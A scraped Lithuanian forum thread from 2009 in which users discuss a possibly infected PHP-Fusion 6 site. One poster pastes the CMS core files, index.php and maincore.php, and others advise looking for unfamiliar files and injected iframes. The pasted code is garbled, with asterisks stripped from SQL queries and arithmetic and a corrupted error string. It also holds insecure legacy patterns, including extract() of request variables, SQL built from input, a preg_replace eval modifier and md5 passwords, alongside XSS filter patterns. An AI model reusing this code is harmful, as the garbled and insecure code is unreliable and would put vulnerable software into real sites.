PHP-Fusion 6 Content Management System +----------------------------------------------------+ \| Copyright © 2002 - 2006 Nick Jones \| http://www.php-fusion.co.uk/ +----------------------------------------------------+ \| Released under the terms & conditions of v2 of the \| GNU General Public License. For details refer to \| the included gpl.txt file or visit http://gnu.org +----------------------------------------------------/ if (!defined("IN_FUSION")) { header("Location: index.php"); exit; } require_once THEME."theme.php"; if ($settings['maintenance'] == "1" && !iADMIN) fallback(BASEDIR."maintenance.php"); if (iMEMBER) $result = dbquery("UPDATE ".$db_prefix."users SET user_lastvisit='".time()."', user_ip='".USER_IP."' WHERE user_id='".$userdata['user_id']."'"); echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"> <html> <head> <title>".$settings['sitename']."</title> <meta http-equiv='Content-Type' content='text/html; charset=".$locale['charset']."'> <meta name='description' content='".$settings['description']."'> <meta name='keywords' content='".$settings['keywords']."'> <link rel='stylesheet' href='".THEME."styles.css' type='text/css'> <script type='text/javascript' src='".INCLUDES."jscript.js'></script> </head> <body bgcolor='$body_bg' text='$body_text'>\n"; render_header("<img src='".BASEDIR.$settings['sitebanner']."' alt='".$settings['sitename']."' title='".$settings['sitename']."'>"); ?>
Narysx Narys Ekspertas Pranešimai: 2940 Įstojęs: 2007 Rugs. 18 19:09:56	2009 Rugp. 14 17:08:51 5 žinutė iš 8
	index.php: <?php /---------------------------------------------------+ \| PHP-Fusion 6 Content Management System +----------------------------------------------------+ \| Copyright © 2002 - 2006 Nick Jones \| http://www.php-fusion.co.uk/ +----------------------------------------------------+ \| Released under the terms & conditions of v2 of the \| GNU General Public License. For details refer to \| the included gpl.txt file or visit http://gnu.org +----------------------------------------------------/ require_once "maincore.php"; redirect($settings['opening_page']); ?> mncr.: <?php /---------------------------------------------------+ \| PHP-Fusion 6 Content Management System +----------------------------------------------------+ \| Copyright © 2002 - 2006 Nick Jones \| http://www.php-fusion.co.uk/ +----------------------------------------------------+ \| Released under the terms & conditions of v2 of the \| GNU General Public License. For details refer to \| the included gpl.txt file or visit http://gnu.org +----------------------------------------------------/ if (eregi("maincore.php", $_SERVER['PHP_SELF'])) die(); // If register_globals is turned off, extract super globals (php 4.2.0+) if (ini_get('register_globals') != 1) { if ((isset($_POST) == true) && (is_array($_POST) == true)) extract($_POST, EXTR_OVERWRITE); if ((isset($_GET) == true) && (is_array($_GET) == true)) extract($_GET, EXTR_OVERWRITE); } // Prevent any possible XSS attacks via $_GET. foreach ($_GET as $check_url) { if ((eregi("<[^>]script\"?[^>]>", $check_url)) \|\| (eregi("<[^>]object\"?[^>]>", $check_url)) \|\| (eregi("<[^>]iframe\"?[^>]>", $check_url)) \|\| (eregi("<[^>]applet\"?[^>]>", $check_url)) \|\| (eregi("<[^>]meta\"?[^>]>", $check_url)) \|\| (eregi("<[^>]style\"?[^>]>", $check_url)) \|\| (eregi("<[^>]form\"?[^>]>", $check_url)) \|\| (eregi("$[^>]\"?[^)]$", $check_url)) \|\| (eregi("\"", $check_url))) { die (); } } unset($check_url); // Start Output Buffering ob_start(); // Locate config.php and set the basedir path $folder_level = ""; while (!file_exists($folder_level."config.php")) { $folder_level .= "../"; } require_once $folder_level."config.php"; define("BASEDIR", $folder_level); // If config.php is empty, activate setup.php script if (!isset($db_name)) redirect("setup.php"); // Establish mySQL database connection $link = dbconnect($db_host, $db_user, $db_pass, $db_name); // Fetch the Site Settings from the database and store them in the $settings variable $settings = dbarray(dbquery("SELECT FROM ".$db_prefix."settings")); // Sanitise $_SERVER globals $_SERVER['PHP_SELF'] = cleanurl($_SERVER['PHP_SELF']); $_SERVER['QUERY_STRING'] = isset($_SERVER['QUERY_STRING']) ? cleanurl($_SERVER['QUERY_STRING']) : ""; $_SERVER['REQUEST_URI'] = isset($_SERVER['REQUEST_URI']) ? cleanurl($_SERVER['REQUEST_URI']) : ""; $PHP_SELF = cleanurl($_SERVER['PHP_SELF']); // Common definitions define("IN_FUSION", TRUE); define("FUSION_REQUEST", isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI'] != "" ? $_SERVER['REQUEST_URI'] : $_SERVER['SCRIPT_NAME']); define("FUSION_QUERY", isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : ""); define("FUSION_SELF", basename($_SERVER['PHP_SELF'])); define("USER_IP", $_SERVER['REMOTE_ADDR']); define("QUOTES_GPC", (ini_get('magic_quotes_gpc') ? TRUE : FALSE)); // Path definitions define("ADMIN", BASEDIR."administration/"); define("IMAGES", BASEDIR."images/"); define("IMAGES_A", IMAGES."articles/"); define("IMAGES_N", IMAGES."news/"); define("IMAGES_NC", IMAGES."news_cats/"); define("INCLUDES", BASEDIR."includes/"); define("LOCALE", BASEDIR."locale/"); define("LOCALESET", $settings['locale']."/"); define("FORUM", BASEDIR."forum/"); define("INFUSIONS", BASEDIR."infusions/"); define("PHOTOS", IMAGES."photoalbum/"); define("THEMES", BASEDIR."themes/"); // MySQL database functions function dbquery($query) { $result = @mysql_query($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbcount($field,$table,$conditions="") { $cond = ($conditions ? " WHERE ".$conditions : ""); $result = @mysql_query("SELECT Count".$field." FROM ".DB_PREFIX.$table.$cond); if (!$result) { echo mysql_error(); return false; } else { $rows = mysql_result($result, 0); return $rows; } } function dbresult($query, $row) { $result = @mysql_result($query, $row); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbrows($query) { $result = @mysql_num_rows($query); return $result; } function dbarray($query) { $result = @mysql_fetch_assoc($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbarraynum($query) { $result = @mysql_fetch_row($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbconnect($db_host, $db_user, $db_pass, $db_name) { $db_connect = @mysql_connect($db_host, $db_user, $db_pass); $db_select = @mysql_select_db($db_name); if (!$db_connect) { die("<div style='font-family:Verdana;font-size:11px;text-align:center;'><b>Unaašo establish connection to MySQL</b><br>".mysql_errno()." : ".mysql_error()."</div>"); } elseif (!$db_select) { die("<div style='font-family:Verdana;font-size:11px;text-align:center;'><b>Unaašo select MySQL database</b><br>".mysql_errno()." : ".mysql_error()."</div>"); } } // Initialise the $locale array $locale = array(); // Load the Global language file include LOCALE.LOCALESET."global.php"; // Check if users full or partial ip is blacklisted $sub_ip1 = substr(USER_IP,0,strlen(USER_IP)-strlen(strrchr(USER_IP,"."))); $sub_ip2 = substr($sub_ip1,0,strlen($sub_ip1)-strlen(strrchr($sub_ip1,"."))); if (dbcount("()", "blacklist", "blacklist_ip='".USER_IP."' OR blacklist_ip='$sub_ip1' OR blacklist_ip='$sub_ip2'")) { header("Location: http://www.google.com/"); exit; } // PHP-Fusion user cookie functions if (!isset($_COOKIE['fusion_visited'])) { $result=dbquery("UPDATE ".$db_prefix."settings SET counter=counter+1"); setcookie("fusion_visited", "yes", time() + 31536000, "/", "", "0"); } if (isset($_POST['login'])) { $user_pass = md5($_POST['user_pass']); $user_name = preg_replace(array("/\=/","/\#/","/\sOR\s/"), "", stripinput($_POST['user_name'])); $result = dbquery("SELECT FROM ".$db_prefix."users WHERE user_name='$user_name' AND (user_password='".md5($user_pass)."' OR user_password='$user_pass')"); if (dbrows($result) != 0) { $data = dbarray($result); if ($data['user_password'] == $user_pass) { $result = dbquery("UPDATE ".$db_prefix."users SET user_password='".md5($user_pass)."' WHERE user_id='".$data['user_id']."'"); } $cookie_value = $data['user_id'].".".$user_pass; if ($data['user_status'] == 0) { $cookie_exp = isset($_POST['remember_me']) ? time() + 36002430 : time() + 36003; header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", $cookie_value, $cookie_exp, "/", "", "0"); redirect(BASEDIR."setuser.php?user=".$data['user_name'], "script"); } elseif ($data['user_status'] == 1) { redirect(BASEDIR."setuser.php?error=1", "script"); } elseif ($data['user_status'] == 2) { redirect(BASEDIR."setuser.php?error=2", "script"); } } else { redirect(BASEDIR."setuser.php?error=3"); } } if (isset($_COOKIE['fusion_user'])) { $cookie_vars = explode(".", $_COOKIE['fusion_user']); $cookie_1 = isNum($cookie_vars['0']) ? $cookie_vars['0'] : "0"; $cookie_2 = (preg_match("/^[0-9a-z]{32}$/", $cookie_vars['1']) ? $cookie_vars['1'] : ""); $result = dbquery("SELECT FROM ".$db_prefix."users WHERE user_id='$cookie_1' AND user_password='".md5($cookie_2)."'"); unset($cookie_vars,$cookie_1,$cookie_2); if (dbrows($result) != 0) { $userdata = dbarray($result); if ($userdata['user_status'] == 0) { if ($userdata['user_theme'] != "Default" && file_exists(THEMES.$userdata['user_theme']."/theme.php")) { define("THEME", THEMES.$userdata['user_theme']."/"); } else { define("THEME", THEMES.$settings['theme']."/"); } if ($userdata['user_offset'] <> 0) { $settings['timeoffset'] = $settings['timeoffset'] + $userdata['user_offset']; } if (empty($_COOKIE['fusion_lastvisit'])) { setcookie("fusion_lastvisit", $userdata['user_lastvisit'], time() + 3600, "/", "", "0"); $lastvisited = $userdata['user_lastvisit']; } else { $lastvisited = $_COOKIE['fusion_lastvisit']; } } else { header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", "", time() - 7200, "/", "", "0"); setcookie("fusion_lastvisit", "", time() - 7200, "/", "", "0"); redirect(BASEDIR."index.php", "script"); } } else { header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", "", time() - 7200, "/", "", "0"); setcookie("fusion_lastvisit", "", time() - 7200, "/", "", "0"); redirect(BASEDIR."index.php", "script"); } } else { define("THEME", THEMES.$settings['theme']."/"); $userdata = ""; $userdata['user_level'] = 0; $userdata['user_rights'] = ""; $userdata['user_groups'] = ""; } // Redirect browser using the header function function redirect($location, $type="header") { if ($type == "header") { header("Location: ".$location); } else { echo "<script type='text/javascript'>document.location.href='".$location."'</script>\n"; } } // Fallback to safe area in event of unauthorised access function fallback($location) { header("Location: ".$location); exit; } // Clean URL Function, prevents entities in server globals function cleanurl($url) { $bad_entities = array("&", "\"", "'", '\"', "\'", "<", ">", "(", ")", ""); $safe_entities = array("&", "", "", "", "", "", "", "", "", ""); $url = str_replace($bad_entities, $safe_entities, $url); return $url; } // Strip Input Function, prevents HTML in unwanted places function stripinput($text) { if (QUOTES_GPC) $text = stripslashes($text); $search = array("\"", "'", "\\", '\"', "\'", "<", ">", " "); $replace = array(""", "'", "\", """, "'", "<", ">", " "); $text = str_replace($search, $replace, $text); return $text; } // stripslash function, only stripslashes if magic_quotes_gpc is on function stripslash($text) { if (QUOTES_GPC) $text = stripslashes($text); return $text; } // stripslash function, add correct number of slashes depending on quotes_gpc function addslash($text) { if (!QUOTES_GPC) { $text = addslashes(addslashes($text)); } else { $text = addslashes($text); } return $text; } // htmlentities is too agressive so we use this function function phpentities($text) { $search = array("&", "\"", "'", "\\", "<", ">"); $replace = array("&", """, "'", "\", "<", ">"); $text = str_replace($search, $replace, $text); return $text; } // Trim a line of text to a preferred length function trimlink($text, $length) { $dec = array("\"", "'", "\\", '\"', "\'", "<", ">"); $enc = array(""", "'", "\", """, "'", "<", ">"); $text = str_replace($enc, $dec, $text); if (strlen($text) > $length) $text = substr($text, 0, ($length-3))."..."; $text = str_replace($dec, $enc, $text); return $text; } // Validate numeric input function isNum($value) { return (preg_match("/^[0-9]+$/", $value)); } // Parse smiley bbcode into HTML images function parsesmileys($message) { $smiley = array( "#\:\)#si" => "<img src='".IMAGES."smiley/smile.gif' alt='smiley'>", "#\;\)#si" => "<img src='".IMAGES."smiley/wink.gif' alt='smiley'>", "#\:$#si" => "<img src='".IMAGES."smiley/sad.gif' alt='smiley'>", "#\:\\|#si" => "<img src='".IMAGES."smiley/frown.gif' alt='smiley'>", "#\:o#si" => "<img src='".IMAGES."smiley/shock.gif' alt='smiley'>", "#\:p#si" => "<img src='".IMAGES."smiley/pfft.gif' alt='smiley'>", "#b$#si" => "<img src='".IMAGES."smiley/cool.gif' alt='smiley'>", "#\:d#si" => "<img src='".IMAGES."smiley/grin.gif' alt='smiley'>", "#\:@#si" => "<img src='".IMAGES."smiley/angry.gif' alt='smiley'>" ); foreach($smiley as $key=>$smiley_img) $message = preg_replace($key, $smiley_img, $message); return $message; } // Show smiley icons in comments, forum and other post pages function displaysmileys($textarea) { $smiles = ""; $smileys = array ( ":)" => "smile.gif", ";)" => "wink.gif", ":\|" => "frown.gif", ":(" => "sad.gif", ":o" => "shock.gif", ":p" => "pfft.gif", "B)" => "cool.gif", ":D" => "grin.gif", ":@" => "angry.gif" ); foreach($smileys as $key=>$smiley) $smiles .= "<img src='".IMAGES."smiley/$smiley' alt='smiley' onClick=\"insertText('$textarea', '$key');\">\n"; return $smiles; } // Parse bbcode into HTML code function parseubb($text) { $text = preg_replace('#\[b\](.?)\[/b\]#si', '<b>\1</b>', $text); $text = preg_replace('#\[i\](.?)\[/i\]#si', '<i>\1</i>', $text); $text = preg_replace('#\[u\](.?)\[/u\]#si', '<u>\1</u>', $text); $text = preg_replace('#\[center\](.?)\[/center\]#si', '<center>\1</center>', $text); $text = preg_replace('#\[url\]([\r\n])(http://\|ftp://\|https://\|ftps://)([^\s\'\";\+]?)([\r\n])\[/url\]#si', '<a href=\'\2\3\' target=\'_blank\'>\2\3</a>', $text); $text = preg_replace('#\[url\]([\r\n])([^\s\'\";\+]?)([\r\n])\[/url\]#si', '<a href=\'http://\2\' target=\'_blank\'>\2</a>', $text); $text = preg_replace('#\[url=([\r\n])(http://\|ftp://\|https://\|ftps://)([^\s\'\";\+]?)\](.?)([\r\n])\[/url\]#si', '<a href=\'\2\3\' target=\'_blank\'>\4</a>', $text); $text = preg_replace('#\[url=([\r\n])([^\s\'\";\+]?)\](.?)([\r\n])\[/url\]#si', '<a href=\'http://\2\' target=\'_blank\'>\3</a>', $text); $text = preg_replace('#\[mail\]([\r\n])([^\s\'\";:\+]?)([\r\n])\[/mail\]#si', '<a href=\'mailto:\2\'>\2</a>', $text); $text = preg_replace('#\[mail=([\r\n])([^\s\'\";:\+]?)\](.?)([\r\n])\[/mail\]#si', '<a href=\'mailto:\2\'>\3</a>', $text); $text = preg_replace('#\[small\](.?)\[/small\]#si', '<span class=\'small\'>\1</span>', $text); $text = preg_replace('#\[color=(black\|blue\|brown\|cyan\|gray\|green\|lime\|maroon\|navy\|olive\|orange\|purple\|red\|silver\|violet\|white\|yellow)\](.?)\[/color\]#si', '<span style=\'color:\1\'>\2</span>', $text); $text = preg_replace('#\[flash width=([0-9]?) height=([0-9]?)\]([^\s\'\";:\+]?)(\.swf)\[/flash\]#si', '<object classid=\'clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\' codebase=\'http://active.macromedia.com/flash6/cabs/swflash.cab#version=6,0,0,0\' id=\'\3\4\' width=\'\1\' height=\'\2\'><param name=movie value=\'\3\4\'><param name=\'quality\' value=\'high\'><param name=\'bgcolor\' value=\'#ffffff\'><embed src=\'\3\4\' quality=\'high\' bgcolor=\'#ffffff\' width=\'\1\' height=\'\2\' type=\'application/x-shockwave-flash\' pluginspage=\'http://www.macromedia.com/go/getflashplayer\'></embed></object>', $text); $text = preg_replace("#\[img\]((http\|ftp\|https\|ftps)://)(.?)(\.(jpg\|jpeg\|gif\|png\|JPG\|JPEG\|GIF\|PNG))\[/img\]#sie","'<img src=\'\\1'.str_replace(array('.php','?','&','='),'','\\3').'\\4\' style=\'border:0px\'>'",$text); $qcount = substr_count($text, "[quote]"); $ccount = substr_count($text, "[code]"); for ($i=0;$i < $qcount;$i++) $text = preg_replace('#\[quote\](.?)\[/quote\]#si', '<div class=\'quote\'>\1</div>', $text); for ($i=0;$i < $ccount;$i++) $text = preg_replace('#\[code\](.?)\[/code\]#si', '<div class=\'quote\' style=\'width:400px;white-space:nowrap;overflow:auto\'><code style=\'white-space:nowrap\'>\1<br><br><br></code></div>', $text); $text = descript($text,false); return $text; } // This function sanitises news & article submissions function descript($text,$striptags=true) { // Convert problematic ascii characters to their true values $search = array("40","41","58","65","66","67","68","69","70", "71","72","73","74","75","76","77","78","79","80","81", "82","83","84","85","86","87","88","89","90","97","98", "99","100","101","102","103","104","105","106","107", "108","109","110","111","112","113","114","115","116", "117","118","119","120","121","122" ); $replace = array("(",")",":","a","b","c","d","e","f","g","h", "i","j","k","l","m","n","o","p","q","r","s","t","u", "v","w","x","y","z","a","b","c","d","e","f","g","h", "i","j","k","l","m","n","o","p","q","r","s","t","u", "v","w","x","y","z" ); $entities = count($search); for ($i=0;$i < $entities;$i++) $text = preg_replace("#(&\#)(0".$search[$i]."+);#si", $replace[$i], $text); // the following is based on code from bitflux (http://blog.bitflux.ch/wiki/) // Kill hexadecimal characters completely $text = preg_replace('#(&\#x)([0-9A-F]+);#si', "", $text); // remove any attribute starting with "on" or xmlns $text = preg_replace('#(<[^>]+[\\"\'\s])(onmouseover\|onmousedown\|onmouseup\|onmouseout\|onmousemove\|onclick\|ondblclick\|onload\|xmlns)[^>]>#iU', ">", $text); // remove javascript: and vbscript: protocol $text = preg_replace('#([a-z])=([\`\'\"])script:#iU', '$1=$2nojscript...', $text); $text = preg_replace('#([a-z])=([\`\'\"])javascript:#iU', '$1=$2nojavascript...', $text); $text = preg_replace('#([a-z])=([\'\"])vbscript:#iU', '$1=$2novbscript...', $text); //<span style="width: expression(alert('Ping!'));"></span> (only affects ie...) $text = preg_replace('#(<[^>]+)style=([\`\'\"]).expression\([^>]>#iU', "$1>", $text); $text = preg_replace('#(<[^>]+)style=([\`\'\"]).behaviour\([^>]>#iU', "$1>", $text); if ($striptags) { do { $thistext = $text; $text = preg_replace('#</(applet\|meta\|xml\|blink\|link\|style\|script\|embed\|object\|iframe\|frame\|frameset\|ilayer\|layer\|bgsound\|title\|base)[^>]>#i', "", $text); } while ($thistext != $text); } return $text; } // Scan image files for malicious code function verify_image($file) { $txt = file_get_contents($file); $image_safe = true; if (preg_match('#&(quot\|lt\|gt\|nbsp);#i', $txt)) { $image_safe = false; } elseif (preg_match("#&\#x([0-9a-f]+);#i", $txt)) { $image_safe = false; } elseif (preg_match('#&\#([0-9]+);#i', $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\`\'\"])script:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\`\'\"])javascript:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\'\"])vbscript:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#(<[^>]+)style=([\`\'\"]).expression\([^>]>#iU", $txt)) { $image_safe = false; } elseif (preg_match("#(<[^>]+)style=([\`\'\"]).behaviour\([^>]>#iU", $txt)) { $image_safe = false; } elseif (preg_match("#</(applet\|link\|style\|script\|iframe\|frame\|frameset)[^>]>#i", $txt)) { $image_safe = false; } return $image_safe; } // captcha routines function make_captcha() { global $settings; srand((double)microtime() * 1000000); $temp_num = md5(rand(0,9999)); $captcha_string = substr($temp_num, 17, 5); $captcha_encode = md5($temp_num); $result = mysql_query("INSERT INTO ".DB_PREFIX."captcha (captcha_datestamp, captcha_ip, captcha_encode, captcha_string) VALUES('".time()."', '".USER_IP."', '$captcha_encode', '$captcha_string')"); if ($settings['validation_method'] == "image") { return "<input type='hidden' name='captcha_encode' value='".$captcha_encode."'><img src='".INCLUDES."captcha_include.php?captcha_code=".$captcha_encode."' alt='' />\n"; } else { return "<input type='hidden' name='captcha_encode' value='".$captcha_encode."'><strong>".$captcha_string."</strong>\n"; } } function check_captcha($captchs_encode, $captcha_string) { if (preg_match("/^[0-9a-z]+$/", $captchs_encode) && preg_match("/^[0-9a-z]+$/", $captcha_string)) { $result = dbquery("SELECT * FROM ".DB_PREFIX."captcha WHERE captcha_ip='".USER_IP."' AND captcha_encode='".$captchs_encode."' AND captcha_string='".$captcha_string."'"); if (dbrows($result)) { $result = dbquery("DELETE FROM ".DB_PREFIX."captcha WHERE captcha_ip='".USER_IP."' AND captcha_encode='".$captchs_encode."' AND captcha_string='".$captcha_string."'"); return true; } else { return false; } } else { return false; } } // Replace offensive words with the defined replacement word function censorwords($text) { global $settings; if ($settings['bad_words_enabled'] == "1" && $settings['bad_words'] != "" ) { $word_list = explode("\r\n", $settings['bad_words']); for ($i=0;$i < count($word_list);$i++) { if ($word_list[$i] != "") $text = preg_replace("/".$word_list[$i]."/si", $settings['bad_word_replace'], $text); } } return $text; } // Display the user's level function getuserlevel($userlevel) { global $locale; if ($userlevel==101) { return $locale['user1']; } elseif ($userlevel==102) { return $locale['user2']; } elseif ($userlevel==103) { return $locale['user3']; } } // Check if Administrator has correct rights assigned function checkrights($right) { if (iADMIN && in_array($right, explode(".", iUSER_RIGHTS))) { return true; } else { return false; } } // Check if user is assigned to the specified user group function checkgroup($group) { if (iSUPERADMIN) { return true; } elseif (iADMIN && ($group == "0" \|\| $group == "101" \|\| $group == "102")) { return true; } elseif (iMEMBER && ($group == "0" \|\| $group == "101")) { return true; } elseif (iGUEST && $group == "0") { return true; } elseif (iMEMBER && in_array($group, explode(".", iUSER_GROUPS))) { return true; } else { return false; } } // Compile access levels & user group array function getusergroups() { global $locale; $groups_array = array( array("0", $locale['user0']), array("101", $locale['user1']), array("102", $locale['user2']), array("103", $locale['user3']) ); $gsql = dbquery("SELECT group_id,group_name FROM ".DB_PREFIX."user_groups"); while ($gdata = dbarray($gsql)) { array_push($groups_array, array($gdata['group_id'], $gdata['group_name'])); } return $groups_array; } // Get the name of the access level or user group function getgroupname($group) { global $locale; if ($group == "0") { return $locale['user0']; } elseif ($group == "101") { return $locale['user1']; } elseif ($group == "102") { return $locale['user2']; } elseif ($group == "103") { return $locale['user3']; } else { $gsql = dbquery("SELECT group_id,group_name FROM ".DB_PREFIX."user_groups WHERE group_id='$group'"); if (dbrows($gsql)!=0) { $gdata = dbarray($gsql); return $gdata['group_name']; } else { return "N/A"; } } } function groupaccess($field) { if (iSUPERADMIN) { $res = "($field='0' OR $field='101' OR $field='102' OR $field='103'"; } elseif (iADMIN) { $res = "($field='0' OR $field='101' OR $field='102'"; } elseif (iMEMBER) { $res = "($field='0' OR $field='101'"; } elseif (iGUEST) { $res = "($field='0'"; } if (iUSER_GROUPS != "") $res .= " OR $field='".str_replace(".", "' OR $field='", iUSER_GROUPS)."'"; $res .= ")"; return $res; } // Create a list of files or folders and store them in an array function makefilelist($folder, $filter, $sort=true, $type="files") { $res = array(); $filter = explode("\|", $filter); $temp = opendir($folder); while ($file = readdir($temp)) { if ($type == "files" && !in_array($file, $filter)) { if (!is_dir($folder.$file)) $res[] = $file; } elseif ($type == "folders" && !in_array($file, $filter)) { if (is_dir($folder.$file)) $res[] = $file; } } closedir($temp); if ($sort) sort($res); return $res; } // Create a selection list from an array created by makefilelist() function makefileopts($files, $selected="") { $res = ""; for ($i=0;$i < count($files);$i++) { $sel = ($selected == $files[$i] ? " selected" : ""); $res .= "<option value='".$files[$i]."'$sel>".$files[$i]."</option>\n"; } return $res; } // Universal page pagination function by CrappoMan function makepagenav($start,$count,$total,$range=0,$link=""){ global $locale; if ($link == "") $link = FUSION_SELF."?"; $res=""; $pg_cnt=ceil($total / $count); if ($pg_cnt > 1) { $idx_back = $start - $count; $idx_next = $start + $count; $cur_page=ceil(($start + 1) / $count); $res.="<table cellspacing='1' cellpadding='1' border='0' class='tbl-border'>\n<tr>\n"; $res.="<td class='tbl2'><span class='small'>".$locale['052']."$cur_page".$locale['053']."$pg_cnt</span></td>\n"; if ($idx_back >= 0) { if ($cur_page > ($range + 1)) $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=0'><<</a></td>\n"; $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=$idx_back'><</a></td>\n"; } $idx_fst=max($cur_page - $range, 1); $idx_lst=min($cur_page + $range, $pg_cnt); if ($range==0) { $idx_fst = 1; $idx_lst=$pg_cnt; } for($i=$idx_fst;$i<=$idx_lst;$i++) { $offset_page=($i - 1) * $count; if ($i==$cur_page) { $res.="<td class='tbl1'><span class='small'><b>$i</b></span></td>\n"; } else { $res.="<td class='tbl1'><a class='small' href='$link"."rowstart=$offset_page'>$i</a></td>\n"; } } if ($idx_next < $total) { $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=$idx_next'>></a></td>\n"; if ($cur_page < ($pg_cnt - $range)) $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=".($pg_cnt-1)$count."'>>></a></td>\n"; } $res.="</tr>\n</table>\n"; } return $res; } // Format the date & time accordingly function showdate($format, $val) { global $settings; if ($format == "shortdate" \|\| $format == "longdate" \|\| $format == "forumdate") { return strftime($settings[$format], $val+($settings['timeoffset']3600)); } else { return strftime($format, $val+($settings['timeoffset']3600)); } } // Translate bytes into kb, mb, gb or tb by CrappoMan function parsebytesize($size,$digits=2,$dir=false) { $kb=1024; $mb=1024$kb; $gb=1024$mb; $tb=1024$gb; if (($size==0)&&($dir)) { return "Empty"; } elseif ($size<$kb) { return $size."Bytes"; } elseif ($size<$mb) { return round($size/$kb,$digits)."Kb"; } elseif ($size<$gb) { return round($size/$mb,$digits)."Mb"; } elseif ($size<$tb) { return round($size/$gb,$digits)."Gb"; } else { return round($size/$tb,$digits)."Tb"; } } // User level, Admin Rights & User Group definitions define("iGUEST",$userdata['user_level'] == 0 ? 1 : 0); define("iMEMBER", $userdata['user_level'] >= 101 ? 1 : 0); define("iADMIN", $userdata['user_level'] >= 102 ? 1 : 0); define("iSUPERADMIN", $userdata['user_level'] == 103 ? 1 : 0); define("iUSER", $userdata['user_level']); define("iUSER_RIGHTS", $userdata['user_rights']); define("iUSER_GROUPS", substr($userdata['user_groups'], 1)); if (iADMIN) { define("iAUTH", substr($userdata['user_password'],16,32)); $aidlink = "?aid=".iAUTH; } ?> Subas tvarkoj. Pas tave saitas greičiausiai užkrėstas. Paieškok ar nėra jokių neaiškių failų FTP. Patikrink includes/language folderį.
pokemonu_karalius Narys Terminatorius Pranešimai: 1256 Įstojęs: 2009 Kov. 8 15:03:37	2009 Rugp. 14 17:08:30 6 žinutė iš 8
	iFrame galėjo atsirasti. Man irgi taip buvo. ----- Jau matau ,kad yra jų. Uostyk. Redagavo pokemonu_karalius 2009 Rugp. 14 17:08:19
betmenas Narys Fruktas Pranešimai: 24 Įstojęs: 2009 Lie. 4 17:07:38	2009 Rugp. 14 17:08:48 7 žinutė iš 8
	Ačiū labai Viskas geria dabar.
betmenas Narys Fruktas Pranešimai: 24 Įstojęs: 2009 Lie. 4 17:07:38	2009 Rugp. 14 17:08:24 8 žinutė iš 8
	O kaip gali atrodyt neaiškūs failai?
Narysx Narys Ekspertas Pranešimai: 2940 Įstojęs: 2007 Rugs. 18 19:09:56	2009 Rugp. 14 17:08:17 9 žinutė iš 8
	Su tokiais pavadinimais arba turiniu, kokių nebūna defaultiniam php-fusion'e ir kokių tu pats neįkelei. ;D

Peršokti į forumą: